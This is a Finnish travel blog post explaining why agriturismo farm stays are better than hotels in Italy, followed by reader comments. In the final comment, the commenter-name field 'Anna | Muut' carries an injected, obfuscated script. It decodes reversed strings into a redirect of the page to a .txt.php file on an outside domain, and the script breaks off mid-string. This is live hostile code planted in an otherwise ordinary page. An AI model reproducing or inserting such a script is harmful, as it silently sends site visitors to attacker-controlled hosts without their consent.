Image Alt

Blog

Mikä on agriturismo ja miksi se on hotellia paljon parempi majoitusvaihtoehto Italiassa?

Rakastan hotelleja, niiden sileäksi pedattuja sänkyjä ja hotelliaamiaisia. En kuitenkaan koskaan majoitu hotellissa Italiassa matkustaessani (ja aika harvoin lomamatkoillani muutenkaan). Miksikö? No siksi, että täällä on hotelleille paljon viehättävämpia ja meille sopivampia ja vaihtoehtoja, nimittäin agriturismoja, maatilamatkailupaikkoja. Useimmat agriturismot ovat itsenäisiä maatiloja, joiden omistajat ovat varanneet tai rakentaneet osan tilansa huoneista tai huoneistoista majoituskäyttöön. Ne ovat siis enimmäkseen oikeita maatiloja, joilla tuotetaan hedelmiä, oliiviöljyä, viiniä, lihaa tai juustoja. Mutta agriturismot ovat myös paljon enemmän kuin pelkkä yöpymispaikka maatilalla. Itse asiassa agriturismoa on vähän vaikea määritellä, sillä niitä on laidasta laitaan, luxus-hotelleja vastaavista ylellisistä tiloista aina yksinkertaisiin maatilan piharakennukseen rakennettuihin pariin huoneistoon. Valinnanvaraa löytyy myös agriturismojen tarjoamissa palveluissa: osassa on tarjolla kaikki palvelut kylpylää myöten, osa tarjoaa vain aamiaismajoitusta. Varsin tiheästä agriturismo-verkosta löytyy siis jokaiselle budjetille ja vaatimuksille sopiva paikka ja ne ovat ehdottomasti parhaita paikkoja tutustua todelliseen Italiaan. Listaan tässä kirjoituksessa muutamia syitä, miksi suuntaan aina ensimmäisenä agriturismo.it –sivustolle olinpa sitten lähdössä lyhyelle viikonloppumatkalle tai pitemmälle lomalle Italiassa.

Umbriaa

Ensinnäkin lasten kanssa matkustaessa agriturismot ovat merkittävästi hotellia parempi vaihtoehto. Jokainen joka on matkustanut pienen lapsen kanssa hotellissa, tietää, että lasten nukkumaanmenon jälkeen perushotellihuoneessa on varsin vähän tekemistä. Voi lukea tai katsoa telkkaria äänettömällä (ellei sen valo sitten häiritse lasta). Loma-illoista voi tulla siis pitkiä ja tylsiä, jos lapsi sattuu olemaan iltauninen. Ja isompien, junnupatja-iän jo ohittaneiden lasten kanssa matkustaminen hotellissa vasta hankalaa onkin. Vaikka sattuisikin saamaan neljän hengen huoneen, niin sen jakamisesta parin teinin kanssa on loma kaukana. Ja kahden huoneen varaamisessakin on omat ongelmansa.

Tai mistäs minä tiedän, sillä onnekseni löysin agriturismot jo lasten ollessa pieniä. Ne ovat tehneet lomistani niin paljon parempia! Sillä agriturismosta voi yleensä varata vähintään kahden huonen huoneiston, jossa lasten nukkumaanmenon jälkeen voi vielä nauttia puolison kanssa lasillisen viiniä joko olohuoneessa, terassilla tai parvekkeella. Koska agriturismot harvoin ovat mitään menomestoja, niissä saa usein saa nauttia täydellisestä hiljaisuudesta, jossa kaikki nukkuvat hyvin. Aamulla voi tosin hyvinkin herätä kukonlauluun. Yleensä agriturismoissa onkin eläimiä –  kissoja, koiria, hevosia, kanoja – jotka ovat lasten mieleen. Lisäksi agriturismossa on omaa pihaa, uima-allas ja muutenkin tilaa olla niin pienten kuin isompienkin lasten kanssa. Kannattaa tosin varmistaa, että myös nettiyhteys löytyy. Ja jos lapsukainen nukahtaakin illallispöytään, niin ei hätää: oma peti on lähellä. Tästä pääsemmekin enemmittä aasinsilloitta yhteen agriturismojen parhaimmista puolista…

Antipasti at the agriturismo we r staying for the weekend. Then some great home-made spinach ravioli for primo and most tender pork and mushrooms for secondo. #foodie #antipasto #agriturismo #farmrestaurant #thisisitaly

Helppouden lisäksi parasta – tai paras osa helppoutta, miten vain – agriturismoissa on nimittäin ruoka. Valitsen aina agriturismon, jossa on ravintola tai vähintäänkin varmistan ensin, että lähimpään ravintolaan on kävelymatka. Useimmiten tosin ravintolasta puhuminen on vahvasti liioteltua, sillä monissa paikoissa on vain muutama pöytä, jossa tarjotaan ruokaa lähinnä yöpyjille. Ruokakin voi olla yksinkertaista kotiruokaa, mutta sehän Italiassa juuri parasta onkin! Yleensä ruoka on valmistettu oman tilan antimista ja juomana on oman tilan viiniä tai vähintäänkin omistajat osaavat kertoa, mistä ruoka on hankittu. Agriturismossa illastaminen tulee myös edulliseksi: 30 – 50 euron hintaan per lärvi saa yleensä sekä majoituksen että vähintään kolmen ruokalajin illallisen.Ja kyllä agriturismojen joukosta löytyy ihan huippuravintoloitakin ruokalistoineen. Itse asiassa osa niistä on niin suosittuja, että pöytä kannattaa varata jo majoitusvarauksen yhteydessä.

#Todi #Umbria

Agriturismot ovat myös hotelleja paljon persoonallisempia. Onhan se nyt ihan toista majoittua pliisun hotellin asemesta viinitilalla tai tilalla, josta voi aamulla poimia aprikooseja suoraan puusta. Tai linnassa. Tai maatilalla, jonka päärakennus on vuodelta 1600. Tai vanhassa agriturismoksi muutetussa borgossa, tehdaskylässä. Tai Etelä-Italian masseriassa. Agriturismon omistajat ovat yleensä asuneet paikkakunnalla koko ikänsä ja tuntevat sen kuin…ne, jotka ovat asuneet paikkakunnalla sukupolvia. Heiltä saa vinkkejä siitä, minne mennä lounaalle, mistä voi ostaa viiniä tai oliiviöljyä, missä on seudun idyllisin ranta. Ja jos oikein juttusille antautuu (vaatiii kyllä varmaan italian taitoa), heiltä saa myös kuulla meheviä juoruja ja sellaista paikallishistoriaa, jota ei opaskirjoissa mainita. Tämä kyllä saattaa edellyttää muutamia lasillisia yhdessä isännän kanssa.

talo

Lisäksi agriturismot täyttävät hotelleja paremmin reilun ja eettisen matkailun kriteerit. Ainakin tämän Responsible travel –sivuston majoituspaikoille suunnatun vinkkilistan mukaan. Agriturismot ovat tyypillisesti perheyrityksiä, joissa aamiaispöydän kakut on leiponut isoäiti, keittiössä häärää talon emäntä tai joku paikallinen kokki, tarjoilusta huolehtii perheen nuoret. Jos ei tilalla ole tarjota asiakkaan toivomia omia palveluja, he suosittelevat muita paikallisia yrittäjiä. Naapurin Giuseppe järjestää kalastusmatkoja ja Renate kokkikursseja. Pienen loven ekologisuuteen tekee tosin se, että enimmäkseen yöpyminen agriturismossa edellyttää omaa tai vuokra-autoa. Ne sijaitsevat maaseudulla, maatiloja kun ovat, eikä sinne ole Italiassa kovinkaan hyvät julkiset yhteydet.

Rehellisyyden nimissä täytyyy myöntää, että autovaatimuksen lisäksi agriturismoilla on muutamia muitakin huonoja puolia. Paikallisuus tarkoittaa useimmiten myös sitä, että englantia osataan aika huonosti. Ja koska agriturismojen kirjo on niin valtava, valinta ei nettisivuston perusteella aina mene nappiin, sillä nettikuvissa saa minkä tahansa paikan näyttämään idylliseltä. Niin kuin nyt senkin toscanalaisen agriturismon, joka “unohti” kertoa, että paikassa on samana iltana häät ja koko paikka oli varattu häävieraiden käyttöön. Meidät majoitettiin ikkunattomaan kellarihuoneeseen, ravintola oli varattu, samoin uima-allasalue, eikä niihin ollut muilla asiaa. Kellarihuoneessa ei toiminut netti eikä puhelin, joten  siellä me sit häävieraiden takana selattiin läppäriä ja etsittiin paikkaa, johon lähteä. Lähistöltä löytyikin ihana Borgo Giusto, jossa oli maisemaan täydellisesti upotettu uima-allas, jonka vierellä kasvoi upeita tuoksuvia salviapuskia, josta kokki poimi meidän nähdemme illalla lehtiä kastikkeeseeseen. Paikka kuuluu yhä viehättävimpiin paikkoihin, jossa olen koskaan yöpynyt.
Missing this already. #agriturismo #thisisitaly #howisummer

Kesälomasuunnitelmat ihan vaiheessa. Mulle kelpais tämmöinen koko kesäksi, mut teinit haluaa Suomeen ja kaveriseuraa. #umbria #kesäloma #italia #igersitalia #poolside #view

Pienistä haittapuolista huolimatta pidän agriturismoja hotelleja parempina vaihtoehtoina Italiassa. Niistä saa samat palvelut kuin hotellistakin, mutta ne ovat käytännössä helpompia, lapsiystävällisempiä (myös lemmikkiystävällisempiä, mikä on meille on tärkeää nykyään), persoonallisempia ja eettisempiä ja reilumpia kuin hotellit. Viimeisen syyn vuoksi tämä postaus on  oli tarkoitus olla osa Instagram Travel Thursday -tempausta, jonka vetäjinä Suomessa toimivat matkablogit Muru Mou  Travellover ja Rimma+Laura. Tempauksessa on tarkoitus käyttää aiemmin Instagramissa julkaistuja kuvia ja toukokuun tempauksen annettuna aiheena oli reilu ja eettinen matkailu. Lue tempauksesta lisää täältä.
Minut löydät Instagramista nimellä @kukkulalta

5 1 vote
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

19 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Ansku BCN
8 years ago

Meillä on varattuna yksi aika ihanan kuuloinen agriturismokohde Toscanaan loppukesälle, kun menemme sinne kaverin häihin. Tämä postaus lisäsi nyt varmuutta siitä, että kannatti valita se hotellin sijaan, grazie mille 🙂

Italia-fani
Italia-fani
8 years ago

Täydellisen agriturismon metsästys on on mukavaa puuhaa. On hienoa fiilistellä Roomassa tai Bolognassa kaiken keskellä, mutta maisemallisesti upeasssa paikassa oleva agriturismo on jotain mieletöntä. Oman lempiagriturismomme arvosteluissa ihmiset kertovat käyneensä siellä ties kuinka monetta kertaa. Heinäsirkkojen siritys kesällä, tervapääskyt, lampaat laaksossa ja laakson yläpuolella liitelevät haukat luovat oman äänimaailmansa ikiaikaiseen maisemaan. Omassa lempipaikassamme ei ole omaa ravintolaa, mutta viimeksi isäntämme järjesti päivällisen tuolloin kahdeksan hengen seurueellemme, paikallisia ruokia ja viiniä omasta tuotannosta. Hinta oli lähinnä naurettava. Isäntä on pitänyt huolta siitä, että palaamme takaisin. Meille on tuotu milloin viiniä, milloin elämämme parhaita kirsikoita. Olemme keskustelleet paikallisista ruuista, lähiseudun nähtävyyksistä ja… Read more »

Italia-fani
Italia-fani
8 years ago

Meidän lempiagriturismomme on Umbriassa 25 minuutin ajomatkan päässä Orvietosta. A1:n liittymät ovat joko Orvieto tai Fabro. Paikka on pieni,. Siellä on vain 3 huoneistoa. Siellä on hienosti hoidettu puutarha ja upealla paikalla oleva uima-allas. Huoneistojen sisustusta on mietitty paljon enemmän kuin yleensä jos vertailua tekee nettisivujen kuvien perusteella. Varustelutaso on todella hyvä. Me palaamme sinne kuitenkin ennen kaikkea huikean maiseman vuoksi. Poikamme ottama panoraamakuva oli monta vuotta työtietokoneeni taustakuvana. Paikka on aika korkealla ja sen eteen avautuu kaunis laakso. Laakson toisella puolella rinteessä on vanha pieni kukkulakylä (Allerona). Sieltä löytyy myös hyvätasoinen ravintola (La Panatella). Paikan nettisivut löytyvät osoittteesta http://www.belvederedellecrete.com… Read more »

Mika / Lähtöportti
8 years ago

Tämä oli ihan mainio postaus! Täytyy kuitenkin tunnustaa, etten ole vielä agriturismoa kokeillut. Olemme päässeet mukavasti Italian maaseudun tunnelmaan vuokrataloissakin, mutta muistutit tässä hyvin agriturismon eduista. Yksinkertainen italialainen kotiruoka on todellakin parasta, lapset pitäisivät eläimistä ja saisin varmasti harjoitella italian kieltä mukavassa ympäristössä. Ehkä siis seuraavalla kerralla, kenties vaikka pariksi päiväksi sen vuokratalon lisäksi, voisi suunnata myös agriturismoon.

Annika | Travellover
8 years ago

Hauskaa, että oikeastaan huomaamattasi osallistuit IGTT goes reilu -teemaan. 🙂 Olen niiin monia kertoja ajellut erilaisten agriturismojen ohi, mutten koskaan sellaisessa majoittunut. Myönnän, etten ole ottanut niistä edes selvää. Vastedes lupaan ottaa. Kellariloukkoanne lukuunottamatta sait agriturismomaailman kuulostamaan aivan uskomattoman hienolta. Ja todellakin kuulostaa, että niissä matkailijan tulot jäävät tontille tai ainakin kylään.

Terhi / Muru Mou
8 years ago

Mulla on ihan hirveä Italia-kuume, eikä tällaiset kuvat auta asiaan yhtään! 🙂 Agriturismoa en ole koskaan vielä kokeillut, mutta ehdottomasti täytyy vielä joskus. Oon suunnittelemassa Eurooppa-reissua ensi kuulle, ja siihen olisi voinut toki yhdistää Italian maaseudun, mutta koska olen yksin liikkeellä, en ole ihan varma haluanko vuokrata autoa…

Rimma | RIMMA + LAURA -matkablogi

Ah miksi en tajunnut, että mekin olisimme voineet alkukuun Italian reissulla majoittua näin! Tai siis vuokrasimme kyllä huoneistot parista eri kohteesta, mutta sen olisi voinut hoitaa myös toisella tapaa. No, ensi kerralla sitten 🙂 Kiitos siis vinkistä!!

Laura / RIMMA + LAURA -matkablogi

Hei miten ihana ja hyödyllinen juttu! En ole näistä agriturismoista kuullutkaan aiemmin, mutta vitsit, tuollaiseenhan me sit joskus majoitutaan kun lähdetään perhelomalle Italiaan!

Anna | Muut<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemu
Anna | Muut